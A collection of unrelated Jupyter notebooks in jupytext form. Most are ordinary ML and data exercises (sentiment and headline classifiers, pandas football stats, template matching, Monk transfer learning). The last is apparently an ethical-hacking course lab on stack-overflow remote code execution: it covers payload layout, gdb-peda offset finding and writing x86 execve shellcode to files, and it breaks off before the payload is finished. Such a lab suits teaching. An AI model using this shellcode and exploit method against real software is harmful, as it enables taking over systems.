feature_vector = Dense(150, activation="relu")(feature_vector)
feature_vector = Dense(50, activation="relu")(feature_vector)
output = Dense(5, activation="softmax")(feature_vector)
model = Model(inputs=[seq_input, dense_input], outputs=output)
return model
# + [markdown] _uuid="6879dab4a2dc2daa0a63ab689a7a579a4c4baa5e"
# **Train the Model:**
# + _uuid="6fbcaac73703c1d1c67f3ca439e7023e6f0bf2b1"
train_seq = pad_sequences(tokenizer.texts_to_sequences(train["Phrase"]), maxlen=MAX_SEQUENCE_LENGTH)
test_seq = pad_sequences(tokenizer.texts_to_sequences(test["Phrase"]), maxlen=MAX_SEQUENCE_LENGTH)
# + _uuid="0d4cdf9226840afc92b25b0ca75b4ff520dabf7b"
train_dense = train[dense_features]
y_train = enc.transform(train["Sentiment"].values.reshape(-1, 1))
print("Building the model...")
model = build_model()
model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["acc"])
early_stopping = EarlyStopping(monitor="val_acc", patience=2, verbose=1)
model_save_path = "./model.hdf5"
model_checkpoint = ModelCheckpoint(model_save_path, monitor='val_acc', save_best_only=True, mode='max', verbose=1)
print("Training the model...")
model.fit([train_seq, train_dense], y_train, validation_split=0.15,
epochs=15, batch_size=512, shuffle=True, callbacks=[early_stopping, model_checkpoint], verbose=1)
# + _uuid="51b72d89f24f76c696d3d11523f023a9c3ed4ae3"
|
rotten_tomatoes_sentiment_model_trainer/notebooks/.ipynb_checkpoints/rotten_tomatoes_lstm_sentiment-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
df = pd.read_csv('./Football teams.csv')
df
# -
# 각 Column의 정보는 다음 링크에 있는 것과 같습니다.
#
# https://www.kaggle.com/varpit94/football-teams-rankings-stats
#
# ## Assignments 1
# 패스 성공률이 높은 상위 5개의 팀을 추출 해 보세요
# (hint: sort_values, head)
A1 = df.sort_values('Pass%',ascending = False).head()
A1
# ## Assignments 2
# 모든 팀 중에서 점유율이 60% 이상인 팀을 추출 하세요
A2 = df[df['Possession%']>=60]
A2
# ## Assignments 3
# 5대 리그 중, 제일 과격 한 리그는 무엇일까요? 일단 Yellow Card 갯수 순서로 리그를 정렬 해 주고, 거기서 yellow_cards와 red_cards 수로 정렬 해 주세요!
# (hint: groupby, sum, loc)
A3 = df.groupby(df['Tournament']).sum().sort_values(['yellow_cards','red_cards'],ascending= False)
A3 = A3.loc[:,['yellow_cards','red_cards']]
A3
# ## Assignments 4
#
# 생각해 보니 레드 카드도 감안을 해야 할 것 같습니다. 레드 카드 5점, 옐로우 카드 2점으로 점수를 산정 하여, 해당 점수를 바탕으로 정렬해서, 진짜 과격한 리그가 어느 리그인지 알아 보도록 해봐요!
#
# 아 맞다, df['A'] = df['B'] * 5 + df['C'] * 2
#
# 이런 식으로 새로운 Column을 만들면 되지 않을까요?
A4 = A3
A4['score'] = A4['red_cards']*5 +A4['yellow_cards']*2
A4
# ## Assignments 5
# 흠.. 근데 패스 성공률과 점유율의 상관관계에 대해서 알아보고 싶은데.. 선형 적인 면에서 이를 알 수 있을까요? numpy를 이용해서 covariance matrix를 통해서 알아 보면 될 것 같은데...
#
# hint: to_numpy, T, cov
# +
A5 = df[['Pass%','Possession%']].to_numpy().T
np.cov(A5)
# -
|
assignments/FacerAin/02-YongwooSong.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# fddab748-7a0a-4269-9584-0925c39b973f
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
import cv2
from PIL import Image, ImageOps
import albumentations as A
data = pd.read_csv("../../data/raw/data.csv")
folder_name = "fddab748-7a0a-4269-9584-0925c39b973f"
image_path = "../../data/raw/data/" + folder_name + "/270.jpg"
img = cv2.imread(image_path)
# + pycharm={"name": "#%%\n"}
template = cv2.imread("krugovi.png")
template.shape
_, w, h = template.shape[::-1]
res = cv2.matchTemplate(img, template, cv2.TM_SQDIFF)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
# cv2.rectangle(img, top_left, bottom_right, 255, 2)
plt.figure(figsize=(10, 10))
cv2.rectangle(img, top_left, bottom_right, 255, 2)
plt.subplot(131), plt.imshow(res, cmap='gray')
plt.title('Matching Result'), plt.xticks([]), plt.yticks([])
plt.subplot(132), plt.imshow(img, cmap='gray')
plt.title('Detected Point'), plt.xticks([]), plt.yticks([])
plt.subplot(133), plt.imshow(template)
plt.show()
|
notebooks/naive_modeling/template_matching.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/Tessellate-Imaging/monk_v1/blob/master/study_roadmaps/1_getting_started_roadmap/5_update_hyperparams/1_model_params/5)%20Switch%20deep%20learning%20model%20from%20default%20mode.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# -
# # Goals
#
#
# ### Learn how to switch models post default mode
# # Table of Contents
#
#
# ## [0. Install](#0)
#
#
# ## [1. Load experiment with resnet defaults](#1)
#
#
# ## [2. Change model to densenet ](#2)
#
#
# ## [3. Train](#3)
# <a id='0'></a>
# # Install Monk
#
# - git clone https://github.com/Tessellate-Imaging/monk_v1.git
#
# - cd monk_v1/installation/Linux && pip install -r requirements_cu9.txt
# - (Select the requirements file as per OS and CUDA version)
# !git clone https://github.com/Tessellate-Imaging/monk_v1.git
# Select the requirements file as per OS and CUDA version
# !cd monk_v1/installation/Linux && pip install -r requirements_cu9.txt
# ## Dataset - Weather Classification
# - https://data.mendeley.com/datasets/4drtyfjtfy/1
# ! wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1pxe_AmHYXwpTMRkMVwGeFgHS8ZpkzwMJ' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1pxe_AmHYXwpTMRkMVwGeFgHS8ZpkzwMJ" -O weather.zip && rm -rf /tmp/cookies.txt
# ! unzip -qq weather.zip
# # Imports
# Monk
import os
import sys
sys.path.append("monk_v1/monk/");
#Using mxnet-gluon backend
from gluon_prototype import prototype
# <a id='1'></a>
# # Load experiment with resnet defaults
gtf = prototype(verbose=1);
gtf.Prototype("Project", "experiment-switch-models");
# +
gtf.Default(dataset_path="weather/train",
model_name="resnet18_v1",
freeze_base_network=True, # If True, then freeze base
num_epochs=5);
#Read the summary generated once you run this cell.
# -
# ## As per the summary above
# Model Loaded on device
# Model name: resnet18_v1
# Num of potentially trainable layers: 41
# Num of actual trainable layers: 1
# <a id='2'></a>
# # Switch now to densenet
# +
gtf.update_model_name("densenet121");
# Very impotant to reload network
gtf.Reload();
# -
# <a id='3'></a>
# # Train
# +
#Start Training
gtf.Train();
#Read the training summary generated once you run the cell and training is completed
# -
|
study_roadmaps/1_getting_started_roadmap/5_update_hyperparams/1_model_params/5) Switch deep learning model from default mode.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: conda_tensorflow_p36
# language: python
# name: conda_tensorflow_p36
# ---
# # End-to-End NLP: News Headline Classifier (Local Version)
#
# This notebook trains a PyTorch-based model to classify news headlines between four domains: Business (b), Entertainment (e), Health & Medicine (m) and Science & Technology (t).
#
# The model is trained and evaluated here on the notebook instance itself - and we'll show in the follow-on notebook how to take advantage of Amazon SageMaker to separate these infrastructure needs.
#
# First install some libraries which might not be available across all kernels (e.g. in Studio):
# !pip install ipywidgets
# !pip install torchtext # Depending on your PyTorch version https://pypi.org/project/torchtext/
# ### Download News Aggregator Dataset
#
# We will download our dataset from the **UCI Machine Learning Database** public repository. The dataset is the News Aggregator Dataset and we will use the newsCorpora.csv file. This dataset contains a table of news headlines and their corresponding classes.
#
# +
# %%time
import util.preprocessing
util.preprocessing.download_dataset()
# -
# ### Let's visualize the dataset
#
# We will load the newsCorpora.csv file to a Pandas dataframe for our data processing work.
#
import os
import re
import numpy as np
import pandas as pd
column_names = ["TITLE", "URL", "PUBLISHER", "CATEGORY", "STORY", "HOSTNAME", "TIMESTAMP"]
df = pd.read_csv("data/newsCorpora.csv", names=column_names, header=None, delimiter="\t")
df.head()
# For this exercise we'll **only use**:
#
# - The **title** (Headline) of the news story, as our input
# - The **category**, as our target variable
#
df["CATEGORY"].value_counts()
# The dataset has four article categories: Business (b), Entertainment (e), Health & Medicine (m) and Science & Technology (t).
#
# ## Natural Language Pre-Processing
#
# We'll do some basic processing of the text data to convert it into numerical form that the algorithm will be able to consume to create a model.
#
# We will do typical pre processing for NLP workloads such as: dummy encoding the labels, tokenizing the documents and set fixed sequence lengths for input feature dimension, padding documents to have fixed length input vectors.
#
# ### Dummy Encode the Labels
#
encoded_y, labels = util.preprocessing.dummy_encode_labels(df, "CATEGORY")
print(labels)
print(encoded_y)
df["CATEGORY"][1]
encoded_y[0]
# ### Tokenize and Set Fixed Sequence Lengths
#
# We want to describe our inputs at the more meaningful word level (rather than individual characters), and ensure a fixed length of the input feature dimension.
#
# + _cell_guid="7bcf422f-0e75-4d49-b3b1-12553fcaf4ff" _uuid="46b7fc9aef5a519f96a295e980ba15deee781e97"
processed_docs, tokenizer = util.preprocessing.tokenize_and_pad_docs(df, "TITLE")
# -
df["TITLE"][1]
processed_docs[0]
# ### Import Word Embeddings
#
# To represent our words in numeric form, we'll use pre-trained vector representations for each word in the vocabulary: In this case we'll be using pre-built GloVe word embeddings.
#
# You could also explore training custom, domain-specific word embeddings using SageMaker's built-in [BlazingText algorithm](https://docs.aws.amazon.com/sagemaker/latest/dg/blazingtext.html). See the official [blazingtext_word2vec_text8 sample](https://github.com/awslabs/amazon-sagemaker-examples/tree/master/introduction_to_amazon_algorithms/blazingtext_word2vec_text8) for an example notebook showing how.
#
# %%time
embedding_matrix = util.preprocessing.get_word_embeddings(tokenizer, "data/embeddings")
np.save(
file="./data/embeddings/docs-embedding-matrix",
arr=embedding_matrix,
allow_pickle=False,
)
vocab_size=embedding_matrix.shape[0]
print(embedding_matrix.shape)
# ### Split Train and Test Sets
#
# Finally we need to divide our data into model training and evaluation sets:
#
# +
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(
processed_docs,
encoded_y,
test_size=0.2,
random_state=42
)
# -
# Do you always remember to save your datasets for traceability when experimenting locally? ;-)
os.makedirs("./data/train", exist_ok=True)
np.save("./data/train/train_X.npy", x_train)
np.save("./data/train/train_Y.npy", y_train)
os.makedirs("./data/test", exist_ok=True)
np.save("./data/test/test_X.npy", x_test)
np.save("./data/test/test_Y.npy", y_test)
# ## Define the Model
#
# +
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
seed = 42
np.random.seed(seed)
num_classes=len(labels)
# -
class Net(nn.Module):
def __init__(self, vocab_size = 400000, num_classes = 4):
super(Net, self).__init__()
self.embedding = nn.Embedding(vocab_size, 100)
self.conv1 = nn.Conv1d(100, 128, kernel_size=3)
self.max_pool1d = nn.MaxPool1d(5)
self.flatten1 = nn.Flatten()
self.dropout1 = nn.Dropout(p=0.3)
self.fc1 = nn.Linear(896, 128)
self.fc2 = nn.Linear(128, num_classes)
def forward(self, x):
x = self.embedding(x)
x = torch.transpose(x,1,2)
x = self.flatten1(self.max_pool1d(self.conv1(x)))
x = self.dropout1(x)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return F.softmax(x)
# ## Define Train and Helper Functions
#
# +
def test(model, test_loader, device):
model.eval()
test_loss = 0.0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += F.binary_cross_entropy(output, target, reduction='mean').item() # sum up batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
target_index = target.max(1, keepdim=True)[1]
correct += pred.eq(target_index).sum().item()
test_loss /= len(test_loader.dataset)
print("val_loss: {:.4f}".format(test_loss))
print("val_acc: {:.4f}".format(correct/len(test_loader.dataset)))
def train(train_loader, test_loader, embedding_matrix, vocab_size = 400000, num_classes = 4, epochs = 12, learning_rate = 0.001):
###### Setup model architecture ############
model = Net(vocab_size, num_classes)
model.embedding.weight = torch.nn.parameter.Parameter(torch.FloatTensor(embedding_matrix), False)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model.to(device)
optimizer = optim.RMSprop(model.parameters(), lr=learning_rate)
for epoch in range(1, epochs + 1):
model.train()
running_loss = 0.0
for batch_idx, (X_train, y_train) in enumerate(train_loader, 1):
data, target = X_train.to(device), y_train.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.binary_cross_entropy(output, target)
loss.backward()
optimizer.step()
running_loss += loss.item()
print("epoch: {}".format(epoch))
print("train_loss: {:.6f}".format(running_loss / (len(train_loader.dataset))))
print("Evaluating model")
test(model, test_loader, device)
return model
# -
class Dataset(torch.utils.data.Dataset):
def __init__(self, data, labels):
'Initialization'
self.labels = labels
self.data = data
def __len__(self):
'Denotes the total number of samples'
return len(self.data)
def __getitem__(self, index):
# Load data and get label
X = torch.as_tensor(self.data[index]).long()
y = torch.as_tensor(self.labels[index])
return X, y
# ## Fit (Train) and Evaluate the Model
#
# %%time
# fit the model here in the notebook:
epochs = 1
learning_rate = 0.001
model_dir = 'model/'
trainloader = torch.utils.data.DataLoader(Dataset(x_train, y_train), batch_size=16,
shuffle=True)
testloader = torch.utils.data.DataLoader(Dataset(x_test, y_test), batch_size=1,
shuffle=True )
print("Training model")
model = train(trainloader, testloader, embedding_matrix,
vocab_size=vocab_size, num_classes=num_classes, epochs=epochs, learning_rate=learning_rate)
# ## (**JupyterLab / SageMaker Studio Only**) Installing IPyWidgets Extension
#
# This notebook uses a fun little interactive widget to query the classifier, which works out of the box in plain Jupyter on a SageMaker Notebook Instance - but in JupyterLab or SageMaker Studio requires an extension not installed by default.
#
# **If you're using JupyterLab on a SageMaker Notebook Instance**, you can install it via UI:
#
# - Select "*Settings > Enable Extension Manager (experimental)*" from the toolbar, and confirm to enable it
# - Click on the new jigsaw puzzle piece icon in the sidebar, to open the Extension Manager
# - Search for `@jupyter-widgets/jupyterlab-manager` (Scroll down - search results show up *below* the list of currently installed widgets!)
# - Click "**Install**" below the widget's description
# - Wait for the blue progress bar that appears by the search box
# - You should be prompted "*A build is needed to include the latest changes*" - select "**Rebuild**"
# - The progress bar should resume, and you should shortly see a "Build Complete" dialogue.
# - Select "**Reload**" to reload the webpage
#
# **If you're using SageMaker Studio**, you can install it via CLI:
#
# - Open a new launcher and select **System terminal** (and **not** *Image terminal*)
# - Change to the repository root folder (e.g. with `cd sagemaker-workshop-101`) and check with `pwd` (print working directory)
# - Run `./init-studio.sh` and refresh your browser page when the script is complete.
#
# ## Use the Model (Locally)
#
# Let's evaluate our model with some example headlines...
#
# If you struggle with the widget, you can always simply call the `classify()` function from Python. You can be creative with your headlines!
#
# +
from IPython import display
import ipywidgets as widgets
def classify(text):
"""Classify a headline and print the results"""
processed = tokenizer.preprocess(text)
padded = tokenizer.pad([processed])
final_text = []
for w in padded[0]:
final_text.append(tokenizer.vocab.stoi[w])
final_text = torch.tensor([final_text])
model.cpu()
model.eval()
result = model(final_text)
print(result)
ix = np.argmax(result.detach())
print(f"Predicted class: '{labels[ix]}' with confidence {result[0][ix]:.2%}")
interaction = widgets.interact_manual(
classify,
text=widgets.Text(
value="The markets were bullish after news of the merger",
placeholder="Type a news headline...",
description="Headline:",
layout=widgets.Layout(width="99%"),
)
)
interaction.widget.children[1].description = "Classify!"
# -
# ## Review
#
# In this notebook we pre-processed publicly downloadable data and trained a neural news headline classifier model: As a data scientist might normally do when working on a local machine.
#
# ...But can we use the cloud more effectively to allocate high-performance resources; and easily deploy our trained models for use by other applications?
#
# Head on over to the next notebook, [Headline Classifier SageMaker.ipynb](Headline%20Classifier%20SageMaker.ipynb), where we'll show how the same model can be trained and then deployed on specific target infrastructure with Amazon SageMaker.
#
|
pytorch_alternatives/custom_pytorch_nlp/Headline Classifier Local.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Keras框架实现mnist手写字体的识别
from keras.datasets import mnist
from keras.utils import np_utils
from keras.models import Sequential
from keras.layers import Dense, Activation, Convolution2D, MaxPooling2D, Flatten
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
# ## 1 数据获取及处理\n"
# a>通过keras自建模块导入数据
# b>训练集和测试集需要reshape,channels在前,-1表示不论多少样本
# c>将标签准换为one-hot模式,即0-1二进制类(图片上的数字位置为1,其余为0)
# d>对数据归一化处理,方便使用梯度下降法时更快收敛(需要先将uint8转化为float类型)
|
.ipynb_checkpoints/keras-mnist-cnn-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Stack Overflow - Remote Code Execution
#
# - instead of sending junk and executing the existing code, send your own code and execute it!
# - for this technique to succeed, program's stack must be executable (not just read and write)
# - let's define some terminologies
#
# ### Payload
# - a buffer that contains code and data to exploit the vulnerability
# - payload typically has the following structure:
#
# ```bash
# | repeated nop sled | shellcode | repeated controlled return address |
# ```
# - offset determines the length of the payload
# - shellcode size is fixed depending on what the code is supposed to do
# - usually room to play with the length of nop sled and controlled return address
#
# ### nop sled
# - `\x90` - no operation instruction in assembly
# - if the buffer is large enough, use good number of NOP as a bigger cushion/wider landing zone
# - as the stack may shift a bit, it's harder to land exactly where the shellcode is
# - NOP let's you slide right to your shellcode that spawns a shell/terminal
# - you still need to pad the controlled buffer to make it long enough to overwrite the caller's return address
#
# ### shellcode
# - shellcode is attacker's code that can do anything
# - such as creating/deleting a log file, adding a new user, change filewall rule, etc.
# - binary code that actually exploits the vulnerability
# - most common shellcode typically spawns, local or remote, tcp connect, reverse connect shell/terminal
# - let's you own the system by giving you access to the terminal
# - Shellcodes database - [http://shell-storm.org/shellcode/](http://shell-storm.org/shellcode/)
#
# ### repeated return address
# - address pointing to some address of repeated nop sled where it is stored in buffer variable
# - this controlled return address should overwrite the caller's return address on stack
#
#
# ### Example program that spawns shell/terminal
# - let's look at an example program that spawns shell/terminal on the system by calling system call
# - `shellcode/system_shell.cpp` program uses system function defined in `<stdlib.h>` library to exectue `/bin/sh` command
# ! cat shellcode/system_shell.cpp
# + language="bash"
# input="shellcode/system_shell.cpp"
# output=system_shell.exe
# echo kali | sudo -S ./compile.sh $input $output
# -
# - run system_shell.exe from terminal
# - Jupyter notebook doesn't give shell/terminal
#
# ```
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./system_shell.exe
# $ whoami
# kali
# $ date
# Wed 16 Dec 2020 10:37:24 PM MST
# $ exit
# ```
#
# - note that shellcode:
# - typically is NOT bash command string by itself - /bin/sh
# - is executable binary when executed gives shell/terminal
# - typically written in C/assembly and compiled/assembled as a binary
# - if stored in stack as a part of buffer, stack must be Executable!
# - so the buffer can be treated as executable code
#
#
# ## Remote code execution demos
# - make stack executable
# - use stack variable to store the remote shellcode
# - find the location of the shellcode and execute it
#
# ### Use program argument to smuggle shellcode
# - if the vulnerable program uses argument to get the data, provide shellcode instead of data!
# - let's demonstrate it with `demos/stack_overflow/so_arg.cpp` program
# let's look at the source
# program simply copies and prints the user provided argument
# ! cat demos/stack_overflow/so_arg.cpp
# + language="bash"
# # let's compile and execute the program
# input="demos/stack_overflow/so_arg.cpp"
# output=so_arg.exe
# echo kali | sudo -S ./compile.sh $input $output
# -
# ### crash the program
# - provide a large string and see how the program behaves
# - if the program crashes, availability of the program is violated and is the telltale sign that the program is likeley vulnerabile to stackoverflow!
# ! ./so_arg.exe $(python3 -c 'print("A"*100)')
# note the buffer address!
# How do you know the program has crashed?
# On terminal you'll see segfault!
# On Jupyter notebook it's not obvious...
# provide a longer argument and see if the program segfaults
# ! ./so_arg.exe $(python3 -c 'print("A"*128)')
# also note the buffer address
# provide a longer argument and see if the program segfaults
# ! ./so_arg.exe $(python3 -c 'print("A"*140)')
# buffer size is 128; 124 As crashes the program; notice no Good bye! printed
# also note the buffer address
# - let's verify it on from the terminal that the program actually crashed
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./so_arg.exe $(python3 -c 'print("A"*140)')
# buffer is at 0xffffc2d0
# buffer contains:
# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# zsh: segmentation fault ./so_arg.exe $(python3 -c 'print("A"*140)')
# ```
# ### Remote code exection steps
#
# 1. find the offset using gdb-peda
# 2. generate shellcode using tools (peda, pwntools) or find the right shellcode at [http://shell-storm.org/shellcode/](http://shell-storm.org/shellcode/)
# 3. find the return address of buffer or nop sled
# 4. create payload and send it to the target program appropriately
#
# ### Exploiting using bash and gdb-peda
#
# - find the offset using gdb-peda
# - we'll find the offset that overwrites the caller's return address
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ gdb -q so_arg.exe
# Reading symbols from so_arg.exe...
# ```
#
# - create cyclic pattern (long enough) 200 bytes as an argument and use it to run the program
#
# ```bash
# gdb-peda$ pattern arg 200
# Set 1 arguments to program
#
# gdb-peda$ run
#
# Starting program: /home/kali/EthicalHacking/so_arg.exe 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
# buffer is at 0xffffc250
# buffer contains:
# AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
#
# Program received signal SIGSEGV, Segmentation fault.
# [----------------------------------registers-----------------------------------]
# EAX: 0xf7fb2c00 --> 0xf7faf990 --> 0xf7ef71b0 (<_ZNSoD1Ev>: push ebx)
# EBX: 0x6c414150 ('PAAl')
# ECX: 0x6c0
# EDX: 0x8051bb0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
# ESI: 0xf7de6000 --> 0x1e4d6c
# EDI: 0xf7de6000 --> 0x1e4d6c
# EBP: 0x41514141 ('AAQA')
# ESP: 0xffffc2e0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# EIP: 0x41416d41 ('AmAA')
# EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
# [-------------------------------------code-------------------------------------]
# Invalid $PC address: 0x41416d41
# [------------------------------------stack-------------------------------------]
# 0000| 0xffffc2e0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0004| 0xffffc2e4 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0008| 0xffffc2e8 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0012| 0xffffc2ec ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0016| 0xffffc2f0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0020| 0xffffc2f4 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0024| 0xffffc2f8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0028| 0xffffc2fc ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41416d41 in ?? ()
# ```
#
# ```bash
#
# gdb-peda$ patts
# Registers contain pattern buffer:
# EBX+0 found at offset: 132
# EBP+0 found at offset: 136
# EIP+0 found at offset: 140 <---- !!!THIS IS THE OFFSET!!!
# Registers point to pattern buffer:
# [EDX] --> offset 0 - size ~203
# [ESP] --> offset 144 - size ~56
# Pattern buffer found at:
# 0x08051bb0 : offset 0 - size 200 ([heap])
# 0xf7c000cd : offset 33208 - size 4 (/usr/lib32/libm-2.31.so)
# 0xffffc250 : offset 0 - size 200 ($sp + -0x90 [-36 dwords])
# 0xffffc625 : offset 0 - size 200 ($sp + 0x345 [209 dwords])
# References to pattern buffer found at:
# 0xf7de6d24 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d28 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d2c : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d30 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d34 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d38 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d3c : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xffffbbc4 : 0x08051bb0 ($sp + -0x71c [-455 dwords])
# 0xffffbbe8 : 0x08051bb0 ($sp + -0x6f8 [-446 dwords])
# 0xffffbc14 : 0x08051bb0 ($sp + -0x6cc [-435 dwords])
# 0xffffbc30 : 0x08051bb0 ($sp + -0x6b0 [-428 dwords])
# 0xffffbc34 : 0x08051bb0 ($sp + -0x6ac [-427 dwords])
# 0xffffbc44 : 0x08051bb0 ($sp + -0x69c [-423 dwords])
# 0xffffbc94 : 0x08051bb0 ($sp + -0x64c [-403 dwords])
# 0xffffc0d8 : 0x08051bb0 ($sp + -0x208 [-130 dwords])
# 0xffffc124 : 0x08051bb0 ($sp + -0x1bc [-111 dwords])
# 0xf7e62dcc : 0xffffc250 (/usr/lib32/libstdc++.so.6.0.28)
# 0xffffbd40 : 0xffffc250 ($sp + -0x5a0 [-360 dwords])
# 0xf7e650b7 : 0xffffc625 (/usr/lib32/libstdc++.so.6.0.28)
# 0xffffc3b8 : 0xffffc625 ($sp + 0xd8 [54 dwords])
#
# ```
#
# - buffer address is conviniently printed everytime program is executed
#
# ```bash
#
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./so_arg.exe $(python3 -c 'print("A"*10)') 139 ⨯
# buffer is at 0xffffc360 <--------- buffer address; will this shift as the argument length changes?
# buffer contains:
# AAAAAAAAAA
# Good bye!
# ```
# ### need shellcode
#
# - next we need a **shellcode**
# - a bunch of binary shellcode files are already provided in `shellcode` folder
# ! ls -l ./shellcode/
# ### generate shellcode with GDB-PEDA
#
# - PEDA provides several shellcodes to pick from
# - the following command generates linux/x86 local shellcode
#
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ gdb -q
# gdb-peda$ shellcode generate
# Available shellcodes:
# x86/linux exec
# x86/linux bindport
# x86/linux connect
# x86/bsd exec
# x86/bsd bindport
# x86/bsd connect
#
# gdb-peda$ shellcode generate x86/linux exec
# # x86/linux/exec: 24 bytes
# shellcode = (
# "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
# "\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
# )
#
# ```
# - your can write the generated shellcode to a file for easy access
# - copy line by line hex values between " " and append it to a binary file
# - you can bash echo, or python3
# - the followin code demonstrates writing shellcode to a file using echo command
# -n : do not print the trailing newline
# -e : enable intrepretation of blackslash
# ! echo -ne "\x31\xc0\x50\x68\x2f\x2f\x73\x68" > shellcode_bash.bin
# ! echo -ne "\x68\x2f\x62\x69\x6e\x89\xe3\x31" >> shellcode_bash.bin
# ! echo -ne "\xc9\x89\xca\x6a\x0b\x58\xcd\x80" >> shellcode_bash.bin
# ! wc -c shellcode_bash.bin
# ! hexdump -C shellcode_bash.bin
# - the following Pyton3 script to write the shellcode to a binary file
# Python3 script
with open('shellcode_py3.bin', 'wb') as fout:
fout.write(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31")
fout.write(b"\xc9\x89\xca\x6a\x0b\x58\xcd\x80")
# ! wc -c shellcode_py3.bin
# ! hexdump -C shellcode_py3.bin
# - the following command shows using Python3 from terminal to write the shellcode to a binary file
# Python3 from terminal
